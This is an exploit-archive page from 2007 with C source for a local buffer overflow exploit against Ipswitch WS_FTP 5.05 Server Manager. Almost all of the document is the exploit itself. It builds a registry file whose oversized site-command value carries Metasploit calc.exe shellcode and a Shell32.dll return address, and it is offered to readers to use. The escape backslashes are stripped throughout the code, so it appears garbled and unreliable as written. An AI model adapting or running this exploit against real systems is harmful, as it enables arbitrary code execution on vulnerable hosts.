Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit
# Published : 2007-04-02
# Author : Marsu
# Previous Title : MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)
# Next Title : MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit

/****************************************************************************
*      Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow       *
*                                                                           *
*                                                                           *
* There's a buffer overflow in iftpmgr.exe that can be triggered by         *
* registering a long site command. The result is then saved in the registry *
* and every time the group is checked the bug appears.                      *
* This exploit launches calc.exe.                                           *
*                                                                           *
* Tested against Win XP SP2 FR.                                             *
* Have Fun!                                                                 *
*                                                                           *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                *
****************************************************************************/

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=165 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x26"
"x45x32xe3x83xebxfcxe2xf4xdaxadx76xe3x26x45xb9xa6"
"x1axcex4exe6x5ex44xddx68x69x5dxb9xbcx06x44xd9xaa"
"xadx71xb9xe2xc8x74xf2x7ax8axc1xf2x97x21x84xf8xee"
"x27x87xd9x17x1dx11x16xe7x53xa0xb9xbcx02x44xd9x85"
"xadx49x79x68x79x59x33x08xadx59xb9xe2xcdxccx6exc7"
"x5Cx22x86x03x23x42xcex72xd3xa3x85x4axefxadx05x3e"
"x68x56x59x9fx68x4ex4dxd9xeaxadxc5x82xe3x26x45xb9"
"x8bx1ax1ax03x15x46x13xbbx1bxa5x85x49xb3x4ex3bxea"
"x01x55x2dxaax1dxacx4bx65x1cxc1x26x53x8fx45x6bx57"
"x9bx43x45x32xe3";

int main(int argc, char* argv[])
{
	FILE* regfile;
	char evilbuff[250];

	printf("[+] Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflown");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
	if (argc!=3) {
		printf("[+] Usage: %s <Group> <file.reg>n",argv[0]);
		printf("[+] ex:    %s Marsu Pilami.regn",argv[0]);
		return 0;
	}
	
	memset(evilbuff,'C',250);
	memcpy(evilbuff+4,CalcShellcode,strlen(CalcShellcode));
	memcpy(evilbuff+202,"x46xE4xBDx7C",4);	/*00 50 00 00 in Shell32.dll. We need this to jump back to our shellcode =)
							  CALL DWORD PTR DS:[EDX+90] and our code is at 0x00500040 in DS*/
	memset(evilbuff+215,0,1);
	
	regfile=fopen(argv[2],"wb");
	fprintf(regfile,"Windows Registry Editor Version 5.00rnrn");
	fprintf(regfile,"[HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\iFtpSvc\Domains\%s\Commands]rnrn",argv[1]);
	fprintf(regfile,"[HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\iFtpSvc\Domains\%s\Commands\aa]rn"_Executable"="%s"rn",argv[1],evilbuff);
	fprintf(regfile,""_Arguments"="%s"rn",evilbuff);
	fprintf(regfile,""*everyone"=dword:000000ffrnrn");
	fclose(regfile);
	printf("[+] Done. Have fun!n");
	return 0;
	
}

// www.Syue.com [2007-04-02]